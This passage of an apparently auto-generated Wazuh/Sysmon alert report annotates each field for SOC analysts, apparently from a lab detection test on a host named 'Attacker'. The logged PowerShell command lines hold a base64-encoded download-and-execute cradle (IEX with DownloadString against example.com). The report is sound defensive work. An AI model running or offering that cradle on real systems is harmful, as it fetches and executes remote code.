No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.577+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.577+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.770075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:31.7625296Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280554
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:30.374 ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00} ProcessId: 11408 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00} ParentProcessId: 4172 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:30.374
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc3a-680a-340a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc37-680a-320a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4172
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.593+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.593+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.778141
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:32.4979169Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280555
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:33:32.489 ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00} ProcessId: 11408 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tejp41b.qrm.ps1 CreationUtcTime: 2025-04-24 22:33:32.489 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:32.489
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc3a-680a-340a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tejp41b.qrm.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:33:32.489
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:45.913+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.913+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.780909
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:46.6613401Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280712
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:45.664 ProcessGuid: {94294ddc-bc49-680a-410a-000000000e00} ProcessId: 6832 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00} ParentProcessId: 7368 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:45.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc49-680a-410a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc47-680a-3f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  7368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:45.994+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:45.994+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534205.788971
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:51.1645018Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280763
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:33:51.154 ProcessGuid: {94294ddc-bc4f-680a-460a-000000000e00} ProcessId: 11932 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:33:51.154
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc4f-680a-460a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

